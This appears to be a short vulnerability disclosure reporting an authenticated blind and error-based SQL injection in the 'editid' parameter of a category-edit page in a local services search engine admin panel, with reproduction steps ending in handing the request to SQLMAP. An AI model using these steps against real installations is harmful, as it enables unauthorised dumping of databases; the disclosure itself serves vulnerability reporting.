Authenticated Blind & Error based SQL injection on Local Services Search Engine Management System -v 1.0
Product: LSSMES-V1.0
Vulnerability Title: Authenticated Blind & Error SQLi
Identifier: Owasp Top 10: Injection
Detailed description: It was found that when we update Category using the admin login, edit-category-detail.php is given a GET request containing editid and with all other parameters. Whereas, editid is the parameter that is vulnerable to SQLi. As an admin, a user can dump all the data from the database.
Steps to reproduce:
- Login to the admin page of LSSMES-V1.0, which is http://server_ip/LSSMES/lssems/admin/login.php
2. Click on, Service Category → Manage Category to update presence data.
3. Just a double quote on editid parameter will confirm the SQL injection as below shown image. Update button disappears.
4. After confirming that editid is vulnerable to SQL injection feeding the request to SQLMAP will do the rest of the work for us 😉
Linkedin Profile: https://www.linkedin.com/in/tushar-vaidya-2111s5/
